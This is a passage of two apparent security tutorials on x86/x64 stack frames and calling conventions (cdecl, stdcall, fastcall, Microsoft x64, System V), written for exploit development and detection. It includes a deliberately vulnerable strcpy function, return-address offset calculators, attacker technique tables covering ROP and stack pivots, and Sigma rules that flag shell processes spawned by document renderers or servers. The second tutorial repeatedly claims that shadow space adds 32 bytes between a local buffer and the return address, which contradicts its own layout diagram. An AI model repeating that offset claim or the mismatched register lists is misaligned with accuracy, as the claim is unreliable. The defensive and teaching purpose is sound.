__thiscallCallee cleansC++ this in ECX, args on stack

x86 code conventionally uses EBP as a fixed frame anchor. Every local and argument is addressed relative to it, and each saved EBP points at the caller’s saved EBP, forming a walkable frame chain.

// MSVC x86, compiled /Od (no optimization)
void vuln(char *src) {
    char buf[64];      // local buffer — classic overflow target
    strcpy(buf, src);  // bounded only by src
}
; x86 frame for vuln(), high → low address
push ebp            ; save caller's EBP
mov  ebp, esp       ; EBP anchors this frame
sub  esp, 64        ; allocate buf[64]
; ... strcpy ...
; [EBP + 8]  -> arg1 (src)
; [EBP + 4]  -> return address   ← ret-overwrite target
; [EBP + 0]  -> saved EBP        ← frame chain link
; [EBP - 64] -> buf              ← overflow origin

A buffer overflow that walks upward from [EBP-64] crosses the saved EBP, then the return address — the two values the epilogue and RET consume.


Diagram showing the x86 stack frame layout from higher to lower addresses: function arguments, return address, saved EBP, local variables, and the buffer at the top of ESP
A typical x86 stack frame: overflowing the buffer at [EBP-N] walks upward through locals, corrupting saved EBP and then the return address.

4. x64 Stack Frames: The Windows ABI and Shadow Space

The Windows x64 ABI consolidates every x86 convention into a single calling convention. The first four integer or pointer parameters pass in RCX, RDX, R8, R9; the first four floating-point parameters in XMM0XMM3. Additional arguments spill onto the stack.

Two rules dominate the x64 layout:

  • Shadow space (home space): The caller allocates 32 bytes immediately above the return address, regardless of how many parameters are actually used. The callee may dump RCX/RDX/R8/R9 into this home space if it needs to spill them.
  • 16-byte alignment: RSP must be 16-byte aligned at a CALL. Because CALL pushes an 8-byte return address, RSP is 16n+8 before the call and 16n-aligned on entry to the callee.

Critically, x64 functions typically address locals and arguments RSP-relative, leaving RSP constant for the body of the function. RBP is freed for general use unless alloca() is present.

[High address — caller's frame]
  Stack arg 5+      ← [RSP + 0x28+]
  Shadow [R9]       ← [RSP + 0x20]
  Shadow [R8]       ← [RSP + 0x18]
  Shadow [RDX]      ← [RSP + 0x10]
  Shadow [RCX]      ← [RSP + 0x08]   (relative to callee entry)
  Return Address    ← [RSP + 0x00]   ← ret-overwrite target
  Local variables   ← [RSP - N]
[Low address — grows downward]

Diagram of the x64 Windows ABI stack layout showing extra arguments, 32-byte shadow space, return address, saved non-volatile registers, and local variables down to RSP
The x64 Windows ABI reserves 32 bytes of shadow space above the return address; RSP remains constant through the function body for RSP-relative addressing.

5. Volatile vs. Non-Volatile Registers and Leaf Functions

The x64 convention splits the register file into volatile (caller-saved) and non-volatile (callee-saved). A function that clobbers a non-volatile register must save and restore it in its prologue/epilogue.

ClassRegisters
Volatile (caller-saved)RAX, RCX, RDX, R8R11, XMM0XMM5
Non-volatile (callee-saved)RBX, RBP, RDI, RSI, R12R15, XMM6XMM15

A leaf function changes no non-volatile register (including not altering RSP by calling out). A non-leaf function calls another function — which adjusts RSP — and therefore must establish a frame and register unwind data. This distinction drives whether the compiler emits a prologue and .pdata entry at all.


6. Prologue and Epilogue Deep Dive

The prologue establishes the frame: save callee-saved registers and reserve local space. The epilogue reverses it and returns.

; x86 epilogue
mov  esp, ebp      ; free locals
pop  ebp           ; restore caller's EBP
ret                ; pop return address → EIP

LEAVE is a single instruction equivalent to mov esp, ebp + pop ebp, available on both x86 and x64.

; x64 MASM (ml64) non-leaf frame
sub  rsp, 0x28     ; 0x20 shadow + 8 align pad
; ... body uses [rsp+0x..] for locals/spills ...
add  rsp, 0x28     ; deallocate
ret                ; pop return address → RIP

Many optimized x64 functions omit push rbp entirely and address everything from RSP. Frame Pointer Omission (FPO) saves two instructions and frees RBP as a general register; GCC/Clang do this by default at -O2, and MSVC does similarly with /O2. For exploitation this matters: without a frame pointer there is no [EBP+4] anchor for the return address — offsets must be computed from RSP at a known instruction.

__declspec(noinline) int callee(int a, int b, int c, int d) {
    int local = a + b + c + d;   // forces a real frame + homing
    return local;
}
int caller(void) { return callee(1, 2, 3, 4); }

Compile this on Godbolt or step it in WinDbg to watch RCX/RDX/R8/R9 home into shadow space.


7. Unwind Data and Structured Exception Handling

x64 Windows requires every non-leaf function to register unwind data in the PE .pdata and .xdata sections so the OS can walk frames during structured exception handling. Each function publishes a RUNTIME_FUNCTION and an associated UNWIND_INFO that describes the prologue.

typedef struct _RUNTIME_FUNCTION {
    ULONG BeginAddress;
    ULONG EndAddress;
    ULONG UnwindData;   // RVA to UNWIND_INFO
} RUNTIME_FUNCTION, *PRUNTIME_FUNCTION;

RtlVirtualUnwind() consumes this data to reconstruct caller frames without a frame pointer. For defenders, intact, parseable unwind data is what lets EDR and crash tooling produce a reliable call stack; ROP chains and stack pivots frequently produce stacks that fail to unwind cleanly — itself a detectable anomaly.


8. Reading Stack Frames in a Debugger

In WinDbg or x64dbg you read the live frame directly off RSP.

bp mymodule!vuln        ; break at the function
g                       ; run to it
dps rsp L10             ; dump 16 pointer-sized stack slots
r rsp, rbp, rip         ; show live pointers
k                       ; walk the call stack (uses unwind data)

dps rsp L10 prints the raw stack; the slot at [RSP+0x08] after entry (or the top after the prologue) holds the saved return address, which k resolves to module!function+offset. A return address that resolves to no module — or to the stack itself — is the first sign of a hijacked frame.


9. How Stack Overflows Corrupt Frame Integrity

Overflowing a fixed local buffer writes past its bounds toward higher addresses, in the direction of the saved frame pointer and the return address.

# Conceptual layout arithmetic — NOT a payload.
# 64-byte buffer sitting below the saved return address.
import struct

buf_size      = 64
saved_rbp     = 8          # x86: 4
ret_addr_slot = 8          # x86: 4
offset_to_ret = buf_size + saved_rbp   # bytes before reaching the return slot

print(f"bytes before saved frame ptr: {buf_size}")
print(f"bytes before return address : {offset_to_ret}")

When execution reaches RET, the CPU pops whatever now sits in the return slot into RIP/EIP and jumps there. A controlled overwrite places a valid, attacker-chosen address (a gadget or function); an uncontrolled overwrite leaves garbage, producing an immediate access violation. The distinction matters operationally: uncontrolled corruption crashes loudly (WER dump), while a precise overwrite can transfer control silently — which is exactly why the compiler inserts a guard between the buffer and the return address.


Flow diagram showing how an oversized buffer write sequentially corrupts the GS cookie, saved frame pointer, and return address before RET transfers control to an attacker-chosen address
A stack overflow progresses deterministically from the buffer edge through the GS cookie and saved frame pointer to the return address, hijacking control at the next RET.

10. Modern Mitigations and What They Change About the Layout

Mitigations alter the frame layout or the trust placed in it; none remove the need to understand the stack.

// /GS inserts a cookie between locals and the saved frame data.
void vuln(char *src) {
    char buf[64];
    // prologue: mov rax, __security_cookie; xor rax, rsp; mov [rsp+0x..], rax
    strcpy(buf, src);
    // epilogue: mov rcx, [rsp+0x..]; xor rcx, rsp; call __security_check_cookie
}
MitigationStructural Effect
/GS stack cookie__security_cookie placed between locals and saved return address; mismatch → __report_gsfailure
DEP / NXIMAGE_DLLCHARACTERISTICS_NX_COMPAT; stack pages non-executable, blocking on-stack shellcode
ASLRIMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE; randomizes stack/image base, breaking hardcoded addresses
Control Flow GuardIMAGE_GUARD_CF_INSTRUMENTED; validates indirect call targets
Intel CET Shadow StackCETCOMPAT mitigation; read-only shadow copy of return addresses defeats classic ret-overwrites

11. Common Attacker Techniques

TechniqueDescription
Saved return-address overwriteOverflow a local buffer to replace [RSP+0x08]/[EBP+4] and redirect RET
Saved frame pointer overwriteCorrupt saved RBP/EBP to desynchronize the frame chain or pivot
Stack pivotUse a gadget (xchg rsp, rax; leave; ret) to point RSP at attacker data
ROP chainingDefeat DEP by chaining ret-terminated gadgets via the corrupted stack
SEH overwrite (x86)Corrupt the exception handler chain on the stack to gain control on fault
Off-by-one / frame-pointer overwriteSingle-byte overflow to truncate or shift EBP, shifting subsequent frame math

These primitives all depend on knowing the exact offset from a controllable buffer to the saved control-flow data — which is precisely the layout this tutorial defines.


12. Defensive Strategies & Detection

Detection focuses on the crash artifacts and post-exploitation behavior that stack corruption produces, since the corruption itself is often only visible at the moment of RET.

SignalDetail
Windows Error ReportingAccess violation at abnormal RIP; dumps under %LOCALAPPDATA%\Microsoft\Windows\WER\ReportQueue; Application Event 1000/1001
Sysmon Event ID 1Unusual child process from document/browser renderers (T1203 follow-on)
Sysmon Event ID 10Cross-process stack reads via ReadProcessMemory
Security Event 4672Special privileges to an unexpected logon (T1068 follow-on)
ETW Microsoft-Windows-Kernel-ProcessAnomalous RIP/RSP deltas via call-stack sampling (stack pivot)
ETW Microsoft-Windows-Security-MitigationsEmits events when CFG, DEP, or Shadow Stack violations are blocked

A practical first-line Sigma sketch catches the most common post-exploitation chain — a renderer spawning a shell:

title: Suspicious Child Process From Document Renderer
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\WINWORD.EXE'
      - '\EXCEL.EXE'
      - '\AcroRd32.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\wscript.exe'
  condition: selection
level: high

Hardening checklist: compile with /GS (verify no /GS-), link /NXCOMPAT and /DYNAMICBASE, enable CFG with /guard:cf, turn on CET via SetProcessMitigationPolicy(ProcessUserShadowStackPolicy, ...), enforce /SAFESEH on x86, and configure Windows Defender Exploit Guard for legacy binaries. MITRE mitigation M1050 (Exploit Protection) bundles these OS controls.


13. MITRE ATT&CK Mapping

Stack layout knowledge is foundational rather than a single technique; the mapping below frames it in the defensive direction — recognizing the artifacts each technique produces.

TechniqueMITRE IDDetection
Exploitation for Client ExecutionT1203Sysmon EventID 1 renderer child chains; WER crash dumps
Exploitation for Privilege EscalationT1068Security EventID 4672 unexpected source process
Exploit Public-Facing ApplicationT1190Service crash loops + WER on network-facing daemons
Reflective Code LoadingT1620ETW call-stack anomalies; non-image-backed RIP
Process InjectionT1055Sysmon EventID 8/10; abnormal cross-process access

14. Tools for Stack Analysis

ToolDescriptionLink
WinDbgKernel/user debugging, k, dps, unwind walkingmicrosoft.com
x64dbgLive user-mode stack inspection on x64/x86x64dbg.com
Godbolt Compiler ExplorerView prologue/epilogue and FPO across compilersgodbolt.org
GhidraStatic reconstruction of frames and calling conventionsghidra-sre.org
Process HackerLive thread stacks and call-stack walkingprocesshacker.sourceforge.io
NASMAssemble illustrative prologue/epilogue snippetsnasm.us
GDB + pwndbgCross-platform frame and offset analysisgdb.gnu.org

Summary

  • The stack is a downward-growing region where buffers sit beside the very return address the CPU trusts at RET — which is why it is the primary target of memory-safety exploits.
  • x86 frames anchor on EBP with multiple calling conventions; x64 uses one convention, RCX/RDX/R8/R9 parameters, 32-byte shadow space, 16-byte alignment, and RSP-relative addressing.
  • The prologue saves non-volatile registers and reserves locals; the epilogue (LEAVE/RET) reverses it; frame-pointer omission removes the [EBP+4] anchor and forces RSP-relative offset math.
  • Overflows corrupt saved RBP/EBP and the return address; /GS, DEP, ASLR, CFG, and CET Shadow Stack change the layout’s trust model but not the need to understand it.
  • Detect follow-on activity via WER dumps, Sysmon EventID 1/10, Security 4672, and ETW mitigation/call-stack events, mapped to T1203 and T1068.

Related Tutorials

References

x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V

Objective: Understand how the five major calling conventions — cdecl, stdcall, fastcall, the Microsoft x64 ABI, and the System V AMD64 ABI — dictate argument passing, register ownership, stack cleanup, and alignment, and exactly why those rules determine where return addresses and arguments sit in memory when a vulnerability is triggered.


1. Why Calling Conventions Matter for Exploit Development

A calling convention is the contract between a caller and a callee. It specifies how arguments are passed (stack or registers), where the return value lands, which registers the callee must preserve, and who cleans up the stack. None of this is arbitrary — it is fixed by the ABI for a given platform and compiler.

For a defender or authorized red-teamer, this matters because stack layout is deterministic. When a local buffer overflows, the bytes that land on the saved return address are determined entirely by the convention in force. Reliable overflow payloads, return-to-libc chains, and ROP gadgets all depend on knowing precisely where the return address, arguments, and saved registers sit. Get the convention wrong and your offset math is wrong.


2. Stack Mechanics Refresher: PUSH, POP, CALL, RET

The stack grows downward (toward lower addresses). PUSH decrements the stack pointer (ESP/RSP) and writes; POP reads and increments it.

  • CALL target pushes the return address (the next instruction’s EIP/RIP) onto the stack, then jumps.
  • RET pops that saved address back into the instruction pointer.
  • RET N pops the address and adds N to ESP — this is how a callee cleans caller-pushed arguments.
push arg1          ; arg on stack
call foo           ; pushes return address, jumps to foo
add  esp, 4        ; caller cleans 1 dword arg (cdecl)

Because CALL writes the return address to a predictable slot, any write primitive that reaches that slot redirects control flow. Every convention below differs only in how the arguments around that slot are arranged.


3. x86 cdecl: The C Standard

__cdecl is the default for C functions on 32-bit x86 (MSVC flag /Gd). Arguments are pushed right to left, and the caller cleans the stack. The return value comes back in EAX. C names are decorated with a single leading underscore (_foo), no case translation.

Because the caller cleans up, cdecl is the only x86 convention that supports variadic functions (printf-style va_list) — the callee never needs to know the argument count.

; foo(1, 2, 3);  -- cdecl
push 3             ; rightmost first
push 2
push 1             ; leftmost last
call _foo
add  esp, 12       ; CALLER cleans 3 dwords

Canonical x86 stack frame at function entry (high → low address):

[arg N]          ← pushed last (rightmost)
[arg 2]
[arg 1]          ← pushed first
[return address] ← pushed by CALL
[saved EBP]      ← pushed by prologue (PUSH EBP)
[local vars]     ← ESP after SUB ESP, N

The saved EBP and return address are the primary targets of a stack-based overflow. Overflow a local buffer and you overwrite them in that exact order.


Diagram showing x86 cdecl stack frame from high to low address: last argument, first argument, saved return address, saved EBP, then local buffer where overflow begins
In cdecl, overflowing a local buffer overwrites saved EBP and then the return address in exactly this order — making the offset deterministic.

4. x86 stdcall: The Windows API Convention

__stdcall is the convention for the Win32 API. Arguments still push right to left, but the callee cleans the stack using RET N. This is efficient for fixed-argument functions, but it forbids variadics.

Name decoration encodes the byte count of stack arguments: a leading underscore, an @, then the size in bytes (always a multiple of 4). MessageBoxA with four pointer/int args becomes _MessageBoxA@16.

; foo(1, 2);  -- stdcall, two dword args
push 2
push 1
call _foo@8
; NO add esp here — callee handled it
foo:
    ; ... body ...
    ret 8          ; CALLEE pops 8 bytes of args

For shellcode and custom loaders, the @N suffix matters when resolving and patching the Import Address Table — the decorated name must match the export.


5. x86 fastcall: Register-Based Argument Passing

__fastcall (MSVC flag /Gr) passes the first two integer arguments in ECX and EDX; remaining arguments push right to left, and the callee cleans them. Decoration uses a leading @ (e.g. @foo@8). All __fastcall functions must have prototypes.

; foo(1, 2, 3);  -- MSVC fastcall
mov  ecx, 1        ; arg1 in ECX
mov  edx, 2        ; arg2 in EDX
push 3             ; arg3 on stack
call @foo@12

⚠️ Compiler variance: __fastcall is not standardized across compilers. MSVC uses ECX/EDX. Borland passes the first three arguments in EAX, EDX, ECX. When reversing a non-MSVC binary, verify register usage before trusting any decompiler’s __fastcall label.


6. Microsoft x64 ABI: The Modern Windows Convention

On Windows x64 there is effectively one ABI; the /Gd, /Gr, /Gz flags only exist for x86 targets. The convention is a four-register fastcall:

Argument slotInteger registerFloat register
1RCXXMM0
2RDXXMM1
3R8XMM2
4R9XMM3

Key rules:

  • One-to-one correspondence: each argument maps to exactly one register/slot; a single argument is never split across registers.
  • Any argument larger than 8 bytes, or not sized 1/2/4/8 bytes, is passed by reference.
  • Arguments beyond the first four go on the stack after the shadow space.
  • The stack must be 16-byte aligned before CALL.
  • The x87 stack is unused; all floating-point work uses the 16 XMM registers and is volatile across calls.

Shadow space (home space): the caller must allocate 32 bytes on the stack before the CALL, even if the callee takes fewer than four arguments, and reclaim it afterward. The callee may spill RCX/RDX/R8/R9 into this region.

; foo(a, b, c, d) -- Microsoft x64
mov  rcx, a
mov  rdx, b
mov  r8,  c
mov  r9,  d
sub  rsp, 20h      ; 32 bytes shadow space (caller's job)
call foo
add  rsp, 20h      ; reclaim shadow space

Volatile (caller-saved): RAX, RCX, RDX, R8, R9, R10, R11, XMM4, XMM5.
Non-volatile (callee-saved): RBX, RBP, RDI, RSI, R12R15, XMM6XMM15.


Diagram of Microsoft x64 ABI stack layout showing stack arguments above the mandatory 32-byte shadow space, the saved return address written by CALL, and the callee local frame below, with registers RCX RDX R8 R9 carrying the first four arguments
The mandatory 32-byte shadow space sits between caller stack arguments and the saved return address, shifting buffer-to-RIP offsets by 32 bytes versus an equivalent System V frame.

7. System V AMD64 ABI: The Linux and macOS Convention

System V AMD64 is followed on Linux, macOS, FreeBSD, Solaris, and other POSIX systems. It uses six integer argument registers:

Argument slotInteger registerFloat register
1RDIXMM0
2RSIXMM1
3RDXXMM2
4RCXXMM3
5R8XMM4XMM7 (5–8)
6R9

Additional arguments push onto the stack in reverse order. The return value is in RAX; for 128-bit returns the high 64 bits go in RDX. The stack is 16-byte aligned just before CALL.

  • Callee-saved: RBX, RBP, R12R15. All others are caller-saved.
  • Red zone: the 128 bytes below RSP are reserved and untouched by signal/interrupt handlers. Leaf functions may use this area as their entire frame without adjusting RSP.
  • Syscall variant: kernel entry uses the same registers except R10 replaces RCX (because the syscall instruction clobbers RCX).
  • Varargs: for variadic functions, RAX must hold the number of vector (XMM) registers used, 0–8.
; write(1, buf, len) via syscall -- System V
mov  rax, 1         ; sys_write
mov  rdi, 1         ; fd (arg1)
mov  rsi, buf       ; buffer (arg2)
mov  rdx, len       ; count (arg3)
; NOTE: a syscall uses R10 in place of RCX for arg4
syscall
; leaf function may freely use [rsp-128 .. rsp] (red zone)

⚠️ Shadow space vs. red zone are mutually exclusive and commonly confused. Shadow space (32 bytes above the call) exists only on Windows x64. The red zone (128 bytes below RSP) exists only on System V. Never assume both.


Graph comparing System V AMD64 ABI and Microsoft x64 ABI side by side, highlighting differing argument registers, the System V red zone versus the Microsoft shadow space, and their shared 16-byte alignment requirement
Red zone and shadow space are mutually exclusive per-platform features — conflating them is a classic source of cross-platform shellcode crashes.

8. Side-by-Side Comparison and ABI Detection in Disassembly

PropertyMicrosoft x64System V AMD64
Integer arg registersRCX, RDX, R8, R9RDI, RSI, RDX, RCX, R8, R9
FP arg registersXMM0XMM3XMM0XMM7
Shadow space32 bytes (mandatory)None
Red zoneNone128 bytes below RSP
Callee-savedRBX, RBP, RDI, RSI, R12R15, XMM615RBX, RBP, R12R15

Recognition heuristics in IDA/Ghidra:

  • A sub rsp, 0x20 immediately before CALL and arguments loaded into RCX/RDX/R8/R9Microsoft x64.
  • Arguments loaded into RDI/RSI/RDX and writes into [rsp-8] without a prior sub rspSystem V (red zone).
  • A ret N (non-zero immediate) on 32-bit code ⇒ stdcall or fastcall; arguments in ECX/EDX distinguish fastcall.
  • A bare ret with caller-side add esp, Ncdecl.

Automated ABI detection can misfire on hand-written assembly, non-MSVC fastcall, or -fomit-frame-pointer builds — always confirm against the actual prologue.


9. Calling Conventions as an Attack Surface

Each convention places the return address at a known offset from a local buffer. That offset is the difference between a working and a failing overflow.

In 64-bit binaries, overflowing a buffer controls stack contents, not registers directly — which is exactly why return-oriented programming is needed. To call a libc function on x64 Linux, you must first load the argument register: a pop rdi ; ret gadget sets arg 1 before the call. This is a direct consequence of the System V ABI placing arg 1 in RDI.

On Windows x64, the mandatory 32-byte shadow space shifts the offset from a local buffer to the saved return address by 32 bytes versus an equivalent Linux frame — a classic source of off-by-32 errors in cross-platform shellcode.

A conceptual offset calculator makes the dependency explicit:

def return_addr_offset(buf_size, conv):
    # bytes from start of local buffer to the saved return address
    if conv == "x86_cdecl" or conv == "x86_stdcall":
        return buf_size + 4            # + saved EBP (4 bytes)
    if conv == "sysv_amd64":
        return buf_size + 8            # + saved RBP (8 bytes)
    if conv == "ms_x64":
        return buf_size + 8 + 0x20     # saved RBP + 32B shadow space
    raise ValueError("unknown convention")

Frame-pointer presence (-fomit-frame-pointer removes saved RBP) and shadow space both change the answer — which is why convention awareness precedes any reliable payload.


Flow diagram of a ROP chain on System V AMD64 showing overflow redirecting to a pop-rdi-ret gadget loading arg1 into RDI, then a pop-rsi-ret gadget loading arg2 into RSI, before jumping to a libc function
Every ROP gadget that loads a register is a direct consequence of the ABI — on System V you need pop rdi; ret for arg 1 because the convention mandates RDI, not the stack.

10. Common Attacker Techniques

TechniqueDescription
Saved return-address overwriteOverflow a local buffer to clobber the convention-determined return slot
Return-to-libc (x86)Stack-arranged args (cdecl) let an attacker call system() without shellcode
ROP register loading (x64)Use pop rdi ; ret / pop rcx ; ret gadgets to satisfy the ABI before a call
Shadow-space-aware stack pivotAccount for the 32-byte home space when chaining Windows x64 gadgets
IAT patching via decorationResolve _func@N decorated stdcall imports for shellcode loaders
Reflective API callsManually set up RCX/RDX/R8/R9 + shadow space before invoking LoadLibraryA

Reflective loaders and injected shellcode must respect the target ABI exactly — wrong argument registers or a missing shadow allocation crashes the call.


11. Defensive Strategies & Detection

Note: A calling convention is a compile-time/binary property — no Sysmon Event ID fires because a convention is used. Detection is indirect: it triggers on the runtime artifacts of a convention-aware exploit.

Compile-time mitigations motivated directly by convention layout:

  • Stack canaries/GS (MSVC), -fstack-protector-strong (GCC/Clang) detect return-address overwrite before RET.
  • Control Flow Guard/guard:cf validates indirect CALL targets.
  • Intel CET / Shadow Stack — hardware enforces that RET pops the address CALL pushed, directly countering return-address overwrites. Mark binaries with IMAGE_DLLCHARACTERISTICS_GUARD_CET_COMPAT (0x4000).
  • ASLR + PIE — randomizes addresses so known layout still yields unknown absolute targets.
  • -mno-red-zone — hardens Linux kernel modules against red-zone clobbering.

Runtime telemetry for the exploitation aftermath:

  • Sysmon Event ID 1 (Process Create) — anomalous children of network-facing services after a successful ROP/return-to-libc chain.
  • Sysmon Event ID 10 (Process Access) — VirtualAllocEx/WriteProcessMemory from convention-correct injected shellcode.
  • Sysmon Event ID 7 (Image Load) — unexpected DLL loads from a corrupted return address redirecting into LoadLibrary.
  • Microsoft-Windows-Threat-Intelligence ETW — kernel telemetry on NtAllocateVirtualMemory / NtWriteVirtualMemory.
  • Audit Process Creation (Event 4688) with command-line logging.
title: Suspicious Child Process from Network-Facing Service After Exploitation
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\w3wp.exe'
      - '\sqlservr.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
  condition: selection
level: high

12. Tools for Calling-Convention Analysis

ToolDescriptionLink
IDA Pro / GhidraDecompiler ABI inference and stack-frame reconstructionghidra-sre.org
x64dbgLive register/stack inspection on Windowsx64dbg.com
GDB + pwndbgStack and register view on Linux (x/16gx $rsp)gnu.org
WinDbgInspect shadow space and frame layout (dd rsp)microsoft.com
Godbolt Compiler ExplorerCompare emitted asm across conventions/compilersgodbolt.org
ROPgadget / RopperEnumerate pop rdi ; ret-style register-loading gadgetsgithub.com
NASMHand-assemble convention test casesnasm.us
Radare2Cross-platform disassembly and ABI heuristicsrada.re

13. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Exploitation for Client ExecutionT1203Crash telemetry, Event 4688 child-process anomalies
Exploit Public-Facing ApplicationT1190WAF/IDS, anomalous service children (Event ID 1)
Process InjectionT1055Sysmon Event ID 10 (VirtualAllocEx/WriteProcessMemory)
Process Injection: DLL InjectionT1055.001Event ID 7 unexpected LoadLibraryA loads
Command and Scripting InterpreterT1059Event ID 1 cmd.exe/powershell.exe spawns
Reflective Code LoadingT1620ETW Threat-Intelligence memory-write telemetry

ATT&CK has no technique ID for “calling-convention abuse” — convention knowledge is prerequisite craft underlying these exploitation and injection techniques.


Summary

  • Calling conventions are the binary-level contract that makes stack layout deterministic — and therefore exploitable.
  • x86 splits into cdecl (caller cleanup, variadics, _foo), stdcall (callee RET N, _foo@N), and fastcall (ECX/EDX, MSVC-specific vs. Borland’s EAX/EDX/ECX).
  • The two 64-bit ABIs differ in argument registers (RCX,RDX,R8,R9 vs. RDI,RSI,RDX,RCX,R8,R9), shadow space (Windows only) vs. red zone (System V only), and callee-saved sets.
  • Convention dictates the buffer-to-return-address offset and the ROP register-loading gadgets required — pop rdi ; ret on Linux, shadow-space accounting on Windows.
  • Detect the exploitation artifacts, not the convention: Sysmon Event IDs 1/7/10, ETW Threat-Intelligence telemetry, and Event 4688, hardened with canaries, CFG, and CET shadow stacks.

Related Tutorials

References